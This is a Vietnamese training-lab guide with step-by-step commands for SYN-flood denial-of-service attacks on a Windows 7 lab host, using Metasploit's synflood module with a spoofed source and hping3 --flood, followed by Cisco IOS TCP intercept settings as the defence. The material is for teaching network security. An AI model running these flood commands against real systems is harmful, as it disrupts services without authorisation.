Lab 10-1: Tấn công tràn SYN bằng Metasploit
Sử dụng Kali Linux để tấn công tràn SYN trên máy Windows 7 (10.10.50.202) bằng Metasploit Framework. Chúng ta cũng dùng bộ lọc Wireshark để kiểm tra gói tin trên máy nạn nhân.
Quy trình
- Mở Kali Linux Terminal
- Nhập lệnh dưới để quét port 21
nmap –p 21 10.10.50.202
Port 21 mở, đã được lọc
- Nhập lệnh
msfconsole
để khởi chạy Metasploit framework
- Nhập lệnh
use auxiliary/dos/tcp/synflood
- Sau đó nhập
show options
Kết quả cho thấy thiết lập mặc định và thông số bắt buộc.
- Nhập các lệnh sau:
set RHOST 10.10.50.202
set RPORT 21
set SHOST 10.0.0.1
set TIMEOUT 30000
- Nhập lệnh exploit để bắt đầu tấn công tràn SYN
- Đăng nhập vào máy Windows 7 (nạn nhân)
- Mở Task Manager và quan sát biểu đồ hoạt động
- Mở Wireshark và chuyển bộ lọc thành TCP cho những gói tin cần lọc
Lab 10-2: Tấn công tràn SYN bằng Hping3
Ở đây, chúng ta sẽ sử dụng Kali Linux để tấn công tràn SYN trên máy Windows 7 (10.10.50.202) bằng lệnh Hping3. Chúng ta cũng dùng bộ lọc Wireshark để kiểm tra gói tin trên máy nạn nhân.
Quy trình
- Mở Kali Linux Terminal
- Nhập lệnh
hping3 10.10.50.202 –flood
- Mở máy Windows 7 và thu thập gói tin
- Ứng dụng Wireshark có thể không phản hồi
Lab 10-3: Thiết lập lệnh chặn bắt TCP trên bộ định tuyến Cisco IOS
Router(config)# access-list <access-list-number> {deny | permit} TCP any <destination> <destination-wildcard>
access-list 101 permit TCP any 192.168.1.0 0.0.0.255
ip tcp intercept list access-list-number
ip tcp intercept list 101
ip tcp intercept mode {intercept | watch}